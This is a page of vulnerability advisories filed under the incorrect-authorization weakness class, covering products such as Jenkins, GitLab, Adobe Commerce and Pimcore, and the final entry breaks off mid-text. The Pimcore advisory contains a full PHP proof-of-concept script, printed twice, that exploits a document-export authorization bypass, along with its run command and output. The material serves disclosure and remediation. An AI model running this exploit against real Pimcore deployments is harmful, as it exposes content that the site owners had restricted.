Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5548 vulnerabilities reference this CWE, most recent first.

GHSA-32W5-2RP6-RG25

Vulnerability from github – Published: 2023-04-02 21:30 – Updated: 2023-04-07 21:30
VLAI
Details

Permission bypass when importing or synchronizing entries in User vault in Devolutions Server 2022.3.13 and prior versions allows users with restricted rights to bypass entry permission via id collision.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-1603"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-02T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Permission bypass when importing or synchronizing entries in User vault in Devolutions Server 2022.3.13 and prior versions allows users with restricted rights to bypass entry permission via id collision.",
  "id": "GHSA-32w5-2rp6-rg25",
  "modified": "2023-04-07T21:30:15Z",
  "published": "2023-04-02T21:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1603"
    },
    {
      "type": "WEB",
      "url": "https://devolutions.net/security/advisories/DEVO-2023-0008"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-32XP-M6VG-GWPJ

Vulnerability from github – Published: 2022-05-24 17:25 – Updated: 2022-12-20 21:22
VLAI
Summary
Missing permission check in Jenkins Pipeline Maven Integration Plugin allows enumerating credentials IDs
Details

Pipeline Maven Integration Plugin 3.8.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read access to Jenkins to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Pipeline Maven Integration Plugin 3.8.3 requires the appropriate permissions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:pipeline-maven"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-2233"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-12-20T21:22:39Z",
    "nvd_published_at": "2020-08-12T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Pipeline Maven Integration Plugin 3.8.2 and earlier does not perform a permission check in an HTTP endpoint.\n\nThis allows attackers with Overall/Read access to Jenkins to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.\n\nAn enumeration of credentials IDs in Pipeline Maven Integration Plugin 3.8.3 requires the appropriate permissions.",
  "id": "GHSA-32xp-m6vg-gwpj",
  "modified": "2022-12-20T21:22:39Z",
  "published": "2022-05-24T17:25:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2233"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/pipeline-maven-plugin"
    },
    {
      "type": "WEB",
      "url": "https://jenkins.io/security/advisory/2020-08-12/#SECURITY-1794%20(1)"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/08/12/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Missing permission check in Jenkins Pipeline Maven Integration Plugin allows enumerating credentials IDs"
}

GHSA-332X-R494-54FQ

Vulnerability from github – Published: 2026-05-27 22:27 – Updated: 2026-07-10 19:07
VLAI
Summary
Pimcore has a WordExport Authorization Bypass for Unauthorized Document Export
Details

Summary

The WordExport export flow only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself.
As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.

In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:

  • POC-WORDEXPORT-TITLE
  • POC-WORDEXPORT-DESC

Root Cause

The controller only performs a feature-level permission check before starting the export flow:

It then directly resolves the target element from attacker-controlled type/id input:

For document-like elements such as Page and Snippet, it renders content in an admin context:

No object-level authorization check such as isAllowed('view') is enforced on the target element.

Affected Scope

Based on the source code, the following element types may be affected:

  • page
  • snippet
  • email
  • object

For page-like documents, the pimcore_admin = true rendering context may expose additional backend-visible content.

Preconditions

  • The attacker is an authenticated backend user
  • The attacker has the word_export permission
  • The attacker does not have view permission on the target document

Reproduction Environment

<?php
declare(strict_types=1);

use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController;
use Pimcore\Controller\UserAwareController;
use Pimcore\Model\Document\Page;
use Pimcore\Model\User;
use Pimcore\Security\User\TokenStorageUserResolver;
use Pimcore\Security\User\User as SecurityUser;
use Pimcore\Serializer\Serializer as PimcoreSerializer;
use Pimcore\Tool\Authentication;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\Filesystem\Filesystem;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\RequestStack;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;

require dirname(__DIR__) . '/vendor/autoload.php';

define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));

try {
    \Pimcore\Bootstrap::bootstrap();

    $kernel = new \App\Kernel('dev', true);
    \Pimcore::setKernel($kernel);
    $kernel->boot();

    $container = $kernel->getContainer();

    /** @var RequestStack $requestStack */
    $requestStack = getService($container, [
        RequestStack::class,
        'request_stack',
    ]);

    $admin = User::getByName('admin');
    if (!$admin instanceof User) {
        fail('admin user is missing');
    }

    $auditor = User::getByName('auditor_wordexport');
    if (!$auditor instanceof User) {
        $auditor = new User();
        $auditor->setParentId(0);
        $auditor->setName('auditor_wordexport');
    }

    $auditor->setAdmin(false);
    $auditor->setActive(true);
    $auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass'));
    $auditor->setPermissions(['word_export']);
    $auditor->setRoles([]);
    $auditor->setWorkspacesDocument([]);
    $auditor->setWorkspacesAsset([]);
    $auditor->setWorkspacesObject([]);
    $auditor->save();

    $page = Page::getByPath('/poc-wordexport-secret-page');
    if (!$page instanceof Page) {
        $page = new Page();
        $page->setParentId(1);
        $page->setKey('poc-wordexport-secret-page');
    }

    $page->setPublished(true);
    $page->setController('App\\Controller\\DefaultController::defaultAction');
    $page->setTemplate('default/default.html.twig');
    $page->setTitle('POC-WORDEXPORT-TITLE');
    $page->setDescription('POC-WORDEXPORT-DESC');
    $page->setProperty('language', 'text', 'en', false, true);
    $page->setUserOwner($admin->getId());
    $page->setUserModification($admin->getId());
    $page->save();

    $canViewPage = $page->getDao()->isAllowed('view', $auditor);

    $tokenResolver = buildTokenResolver($auditor);
    $controller = wireController(new WordExportController(), $container, $tokenResolver);

    $exportId = 'wordexportpoc1';
    $exportRequest = new Request([], [
        'id' => $exportId,
        'data' => json_encode([
            ['type' => 'document', 'id' => $page->getId()],
        ], JSON_THROW_ON_ERROR),
        'source' => 'en',
    ]);

    $requestStack->push($exportRequest);
    $controller->wordExportAction($exportRequest, new Filesystem());
    $requestStack->pop();

    $downloadRequest = new Request(['id' => $exportId]);
    $requestStack->push($downloadRequest);
    $downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
    $requestStack->pop();

    $wordContent = (string) $downloadResponse->getContent();

    echo json_encode([
        'vulnerability' => 'wordexport_authorization_bypass',
        'user' => [
            'id' => $auditor->getId(),
            'name' => $auditor->getName(),
            'permissions' => $auditor->getPermissions(),
        ],
        'target_page' => [
            'id' => $page->getId(),
            'path' => $page->getFullPath(),
            'title' => $page->getTitle(),
            'description' => $page->getDescription(),
            'user_can_view_page' => $canViewPage,
        ],
        'result' => [
            'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'),
            'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'),
        ],
    ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
} catch (Throwable $e) {
    fail(sprintf(
        '%s: %s in %s:%d%s',
        $e::class,
        $e->getMessage(),
        $e->getFile(),
        $e->getLine(),
        $e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : ''
    ));
}

function wireController(
    UserAwareController $controller,
    ContainerInterface $container,
    TokenStorageUserResolver $tokenResolver
): UserAwareController
{
    $controller->setContainer($container);
    $controller->setTokenResolver($tokenResolver);

    if (method_exists($controller, 'setPimcoreSerializer')) {
        /** @var PimcoreSerializer $serializer */
        $serializer = getService($container, [
            PimcoreSerializer::class,
            'Pimcore\\Serializer\\Serializer',
        ]);
        $controller->setPimcoreSerializer($serializer);
    }

    return $controller;
}

function buildTokenResolver(User $user): TokenStorageUserResolver
{
    $tokenStorage = new TokenStorage();
    $proxyUser = new SecurityUser($user);
    $token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles());
    $tokenStorage->setToken($token);

    return new TokenStorageUserResolver($tokenStorage);
}

function getService(ContainerInterface $container, array $ids): mixed
{
    foreach ($ids as $id) {
        try {
            if ($container->has($id)) {
                return $container->get($id);
            }
        } catch (Throwable) {
        }
    }

    fail('Unable to resolve service: ' . implode(', ', $ids));
}

function fail(string $message): never
{
    fwrite(STDERR, $message . PHP_EOL);
    exit(1);
}

Reproduction Steps

  1. Create a low-privileged user named auditor_wordexport with only the word_export permission and no document workspace permissions.
  2. Create a test page at /poc-wordexport-secret-page containing sensitive values:
  3. title = POC-WORDEXPORT-TITLE
  4. description = POC-WORDEXPORT-DESC
  5. Verify that the user does not have view permission on that page.
  6. Execute wordExportAction() and wordExportDownloadAction() as that user.
  7. Check whether the exported HTML contains the sensitive values.

Reproduction command:

cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc_wordexport.php

Reproduction Result

Relevant PoC output:

{
  "vulnerability": "wordexport_authorization_bypass",
  "user": {
    "name": "auditor_wordexport",
    "permissions": [
      "word_export"
    ]
  },
  "target_page": {
    "path": "/poc-wordexport-secret-page",
    "title": "POC-WORDEXPORT-TITLE",
    "description": "POC-WORDEXPORT-DESC",
    "user_can_view_page": false
  },
  "result": {
    "download_contains_title": true,
    "download_contains_description": true
  }
}

This shows that:

  • The user cannot view the target page
  • The exported file still contains the page's sensitive content

This confirms that the issue is practically exploitable.

Security Impact

  • Unauthorized disclosure of structured page fields
  • Unauthorized export of restricted backend content
  • Potential exposure of unpublished or otherwise restricted content
  • Lateral data access by low-privileged backend accounts

Remediation

  1. Perform object-level authorization immediately after resolving the element from type/id.
  2. Require at least view permission on the target element.
  3. Apply consistent authorization checks across page, snippet, email, and object.
  4. Bind export creation and export download to the requesting user or an equivalent authorization context.
  5. Add regression tests to ensure that users with word_export but without element view permission cannot export content.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "12.0.0-RC1"
            },
            {
              "fixed": "12.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 11.5.16"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "11.5.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2026.1.0"
            },
            {
              "fixed": "2026.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45703"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-27T22:27:18Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe `WordExport` export flow only checks whether the current backend user has the feature permission `word_export`. It does not verify access rights on the target element itself.  \nAs a result, a low-privileged backend user can export document content even when the user does not have `view` permission on that document.\n\nIn the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:\n\n- `POC-WORDEXPORT-TITLE`\n- `POC-WORDEXPORT-DESC`\n\n### Root Cause\n\nThe controller only performs a feature-level permission check before starting the export flow:\n\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L44)#L41)\n- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)#L44)\n\nIt then directly resolves the target element from attacker-controlled `type/id` input:\n\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)#L58)\n\nFor document-like elements such as `Page` and `Snippet`, it renders content in an admin context:\n\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)\n- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)\n- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)\n\nNo object-level authorization check such as `isAllowed(\u0027view\u0027)` is enforced on the target element.\n\n### Affected Scope\n\nBased on the source code, the following element types may be affected:\n\n- `page`\n- `snippet`\n- `email`\n- `object`\n\nFor page-like documents, the `pimcore_admin = true` rendering context may expose additional backend-visible content.\n\n### Preconditions\n\n- The attacker is an authenticated backend user\n- The attacker has the `word_export` permission\n- The attacker does not have `view` permission on the target document\n\n### Reproduction Environment\n\n- Reproduction root: `pimcore-12.3.3-repro`\n- Standalone PoC script: [[poc_wordexport.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3-repro/tools/poc_wordexport.php)](pimcore-12.3.3-repro/tools/poc_wordexport.php)\n\n```php\n\u003c?php\ndeclare(strict_types=1);\n\nuse Pimcore\\Bundle\\WordExportBundle\\Controller\\TranslationController as WordExportController;\nuse Pimcore\\Controller\\UserAwareController;\nuse Pimcore\\Model\\Document\\Page;\nuse Pimcore\\Model\\User;\nuse Pimcore\\Security\\User\\TokenStorageUserResolver;\nuse Pimcore\\Security\\User\\User as SecurityUser;\nuse Pimcore\\Serializer\\Serializer as PimcoreSerializer;\nuse Pimcore\\Tool\\Authentication;\nuse Symfony\\Component\\DependencyInjection\\ContainerInterface;\nuse Symfony\\Component\\Filesystem\\Filesystem;\nuse Symfony\\Component\\HttpFoundation\\Request;\nuse Symfony\\Component\\HttpFoundation\\RequestStack;\nuse Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken;\nuse Symfony\\Component\\Security\\Core\\Authentication\\Token\\Storage\\TokenStorage;\n\nrequire dirname(__DIR__) . \u0027/vendor/autoload.php\u0027;\n\ndefine(\u0027PIMCORE_PROJECT_ROOT\u0027, dirname(__DIR__));\n\ntry {\n    \\Pimcore\\Bootstrap::bootstrap();\n\n    $kernel = new \\App\\Kernel(\u0027dev\u0027, true);\n    \\Pimcore::setKernel($kernel);\n    $kernel-\u003eboot();\n\n    $container = $kernel-\u003egetContainer();\n\n    /** @var RequestStack $requestStack */\n    $requestStack = getService($container, [\n        RequestStack::class,\n        \u0027request_stack\u0027,\n    ]);\n\n    $admin = User::getByName(\u0027admin\u0027);\n    if (!$admin instanceof User) {\n        fail(\u0027admin user is missing\u0027);\n    }\n\n    $auditor = User::getByName(\u0027auditor_wordexport\u0027);\n    if (!$auditor instanceof User) {\n        $auditor = new User();\n        $auditor-\u003esetParentId(0);\n        $auditor-\u003esetName(\u0027auditor_wordexport\u0027);\n    }\n\n    $auditor-\u003esetAdmin(false);\n    $auditor-\u003esetActive(true);\n    $auditor-\u003esetPassword(Authentication::getPasswordHash(\u0027auditor_wordexport\u0027, \u0027auditor-pass\u0027));\n    $auditor-\u003esetPermissions([\u0027word_export\u0027]);\n    $auditor-\u003esetRoles([]);\n    $auditor-\u003esetWorkspacesDocument([]);\n    $auditor-\u003esetWorkspacesAsset([]);\n    $auditor-\u003esetWorkspacesObject([]);\n    $auditor-\u003esave();\n\n    $page = Page::getByPath(\u0027/poc-wordexport-secret-page\u0027);\n    if (!$page instanceof Page) {\n        $page = new Page();\n        $page-\u003esetParentId(1);\n        $page-\u003esetKey(\u0027poc-wordexport-secret-page\u0027);\n    }\n\n    $page-\u003esetPublished(true);\n    $page-\u003esetController(\u0027App\\\\Controller\\\\DefaultController::defaultAction\u0027);\n    $page-\u003esetTemplate(\u0027default/default.html.twig\u0027);\n    $page-\u003esetTitle(\u0027POC-WORDEXPORT-TITLE\u0027);\n    $page-\u003esetDescription(\u0027POC-WORDEXPORT-DESC\u0027);\n    $page-\u003esetProperty(\u0027language\u0027, \u0027text\u0027, \u0027en\u0027, false, true);\n    $page-\u003esetUserOwner($admin-\u003egetId());\n    $page-\u003esetUserModification($admin-\u003egetId());\n    $page-\u003esave();\n\n    $canViewPage = $page-\u003egetDao()-\u003eisAllowed(\u0027view\u0027, $auditor);\n\n    $tokenResolver = buildTokenResolver($auditor);\n    $controller = wireController(new WordExportController(), $container, $tokenResolver);\n\n    $exportId = \u0027wordexportpoc1\u0027;\n    $exportRequest = new Request([], [\n        \u0027id\u0027 =\u003e $exportId,\n        \u0027data\u0027 =\u003e json_encode([\n            [\u0027type\u0027 =\u003e \u0027document\u0027, \u0027id\u0027 =\u003e $page-\u003egetId()],\n        ], JSON_THROW_ON_ERROR),\n        \u0027source\u0027 =\u003e \u0027en\u0027,\n    ]);\n\n    $requestStack-\u003epush($exportRequest);\n    $controller-\u003ewordExportAction($exportRequest, new Filesystem());\n    $requestStack-\u003epop();\n\n    $downloadRequest = new Request([\u0027id\u0027 =\u003e $exportId]);\n    $requestStack-\u003epush($downloadRequest);\n    $downloadResponse = $controller-\u003ewordExportDownloadAction($downloadRequest);\n    $requestStack-\u003epop();\n\n    $wordContent = (string) $downloadResponse-\u003egetContent();\n\n    echo json_encode([\n        \u0027vulnerability\u0027 =\u003e \u0027wordexport_authorization_bypass\u0027,\n        \u0027user\u0027 =\u003e [\n            \u0027id\u0027 =\u003e $auditor-\u003egetId(),\n            \u0027name\u0027 =\u003e $auditor-\u003egetName(),\n            \u0027permissions\u0027 =\u003e $auditor-\u003egetPermissions(),\n        ],\n        \u0027target_page\u0027 =\u003e [\n            \u0027id\u0027 =\u003e $page-\u003egetId(),\n            \u0027path\u0027 =\u003e $page-\u003egetFullPath(),\n            \u0027title\u0027 =\u003e $page-\u003egetTitle(),\n            \u0027description\u0027 =\u003e $page-\u003egetDescription(),\n            \u0027user_can_view_page\u0027 =\u003e $canViewPage,\n        ],\n        \u0027result\u0027 =\u003e [\n            \u0027download_contains_title\u0027 =\u003e str_contains($wordContent, \u0027POC-WORDEXPORT-TITLE\u0027),\n            \u0027download_contains_description\u0027 =\u003e str_contains($wordContent, \u0027POC-WORDEXPORT-DESC\u0027),\n        ],\n    ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;\n} catch (Throwable $e) {\n    fail(sprintf(\n        \u0027%s: %s in %s:%d%s\u0027,\n        $e::class,\n        $e-\u003egetMessage(),\n        $e-\u003egetFile(),\n        $e-\u003egetLine(),\n        $e-\u003egetTraceAsString() ? PHP_EOL . $e-\u003egetTraceAsString() : \u0027\u0027\n    ));\n}\n\nfunction wireController(\n    UserAwareController $controller,\n    ContainerInterface $container,\n    TokenStorageUserResolver $tokenResolver\n): UserAwareController\n{\n    $controller-\u003esetContainer($container);\n    $controller-\u003esetTokenResolver($tokenResolver);\n\n    if (method_exists($controller, \u0027setPimcoreSerializer\u0027)) {\n        /** @var PimcoreSerializer $serializer */\n        $serializer = getService($container, [\n            PimcoreSerializer::class,\n            \u0027Pimcore\\\\Serializer\\\\Serializer\u0027,\n        ]);\n        $controller-\u003esetPimcoreSerializer($serializer);\n    }\n\n    return $controller;\n}\n\nfunction buildTokenResolver(User $user): TokenStorageUserResolver\n{\n    $tokenStorage = new TokenStorage();\n    $proxyUser = new SecurityUser($user);\n    $token = new UsernamePasswordToken($proxyUser, \u0027pimcore_admin\u0027, $proxyUser-\u003egetRoles());\n    $tokenStorage-\u003esetToken($token);\n\n    return new TokenStorageUserResolver($tokenStorage);\n}\n\nfunction getService(ContainerInterface $container, array $ids): mixed\n{\n    foreach ($ids as $id) {\n        try {\n            if ($container-\u003ehas($id)) {\n                return $container-\u003eget($id);\n            }\n        } catch (Throwable) {\n        }\n    }\n\n    fail(\u0027Unable to resolve service: \u0027 . implode(\u0027, \u0027, $ids));\n}\n\nfunction fail(string $message): never\n{\n    fwrite(STDERR, $message . PHP_EOL);\n    exit(1);\n}\n\n```\n\n\n\n### Reproduction Steps\n\n1. Create a low-privileged user named `auditor_wordexport` with only the `word_export` permission and no document workspace permissions.\n2. Create a test page at `/poc-wordexport-secret-page` containing sensitive values:\n   - `title = POC-WORDEXPORT-TITLE`\n   - `description = POC-WORDEXPORT-DESC`\n3. Verify that the user does not have `view` permission on that page.\n4. Execute `wordExportAction()` and `wordExportDownloadAction()` as that user.\n5. Check whether the exported HTML contains the sensitive values.\n\nReproduction command:\n\n```bash\ncd pimcore-12.3.3-repro\ndocker compose exec -T php php tools/poc_wordexport.php\n```\n\n### Reproduction Result\n\nRelevant PoC output:\n\n```json\n{\n  \"vulnerability\": \"wordexport_authorization_bypass\",\n  \"user\": {\n    \"name\": \"auditor_wordexport\",\n    \"permissions\": [\n      \"word_export\"\n    ]\n  },\n  \"target_page\": {\n    \"path\": \"/poc-wordexport-secret-page\",\n    \"title\": \"POC-WORDEXPORT-TITLE\",\n    \"description\": \"POC-WORDEXPORT-DESC\",\n    \"user_can_view_page\": false\n  },\n  \"result\": {\n    \"download_contains_title\": true,\n    \"download_contains_description\": true\n  }\n}\n```\n\nThis shows that:\n\n- The user cannot view the target page\n- The exported file still contains the page\u0027s sensitive content\n\nThis confirms that the issue is practically exploitable.\n\n### Security Impact\n\n- Unauthorized disclosure of structured page fields\n- Unauthorized export of restricted backend content\n- Potential exposure of unpublished or otherwise restricted content\n- Lateral data access by low-privileged backend accounts\n\n### Remediation\n\n1. Perform object-level authorization immediately after resolving the element from `type/id`.\n2. Require at least `view` permission on the target element.\n3. Apply consistent authorization checks across `page`, `snippet`, `email`, and `object`.\n4. Bind export creation and export download to the requesting user or an equivalent authorization context.\n5. Add regression tests to ensure that users with `word_export` but without element `view` permission cannot export content.",
  "id": "GHSA-332x-r494-54fq",
  "modified": "2026-07-10T19:07:24Z",
  "published": "2026-05-27T22:27:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-332x-r494-54fq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/pull/19112"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/commit/0ce2232b6f92c79d0ac244e95e21f55c37456ef1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pimcore/pimcore"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pimcore has a WordExport Authorization Bypass for Unauthorized Document Export"
}

GHSA-3352-M362-5WFX

Vulnerability from github – Published: 2022-05-11 00:01 – Updated: 2022-05-19 00:00
VLAI
Details

Improper access control in GitLab CE/EE affecting all versions starting from 8.12 before 14.8.6, all versions starting from 8.13 before 14.9.4, and all versions starting from 8.14 before 14.10.1 allows non-project members to access contents of Project Members-only Wikis via malicious CI jobs

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1417"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-10T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Improper access control in GitLab CE/EE affecting all versions starting from 8.12 before 14.8.6, all versions starting from 8.13 before 14.9.4, and all versions starting from 8.14 before 14.10.1 allows non-project members to access contents of Project Members-only Wikis via malicious CI jobs",
  "id": "GHSA-3352-m362-5wfx",
  "modified": "2022-05-19T00:00:22Z",
  "published": "2022-05-11T00:01:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1417"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1075586"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1417.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/297282"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3354-PQ6H-R5HC

Vulnerability from github – Published: 2026-03-11 03:31 – Updated: 2026-03-11 03:31
VLAI
Details

Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain limited unauthorized view access of data. Exploitation of this issue does not require user interaction.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21296"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-11T03:15:54Z",
    "severity": "MODERATE"
  },
  "details": "Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and gain limited unauthorized view access of data. Exploitation of this issue does not require user interaction.",
  "id": "GHSA-3354-pq6h-r5hc",
  "modified": "2026-03-11T03:31:27Z",
  "published": "2026-03-11T03:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21296"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/magento/apsb26-05.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-335F-9MR2-FG88

Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-10-27 12:00
VLAI
Details

A vulnerability in the getSelectedMimeTypesByRole function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to view custom extensions added by administrators. This issue affects versions 2.2.3 and prior.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-34627"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-07T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the getSelectedMimeTypesByRole function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to view custom extensions added by administrators. This issue affects versions 2.2.3 and prior.",
  "id": "GHSA-335f-9mr2-fg88",
  "modified": "2022-10-27T12:00:26Z",
  "published": "2022-05-24T19:07:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34627"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34627"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-335X-5WCM-8JV2

Vulnerability from github – Published: 2023-12-13 13:21 – Updated: 2024-01-12 16:28
VLAI
Summary
Backoffice User can bypass "Publish" restriction
Details

Impact

Backoffice users with send for approval permission but not publish permission are able to publish in some scenarios.

Explanation of the vulnerability

Backoffice users without permission to publish content, but only to send for approval, can bypass the restriction by modifying the request body of the "Send for Approval" request.

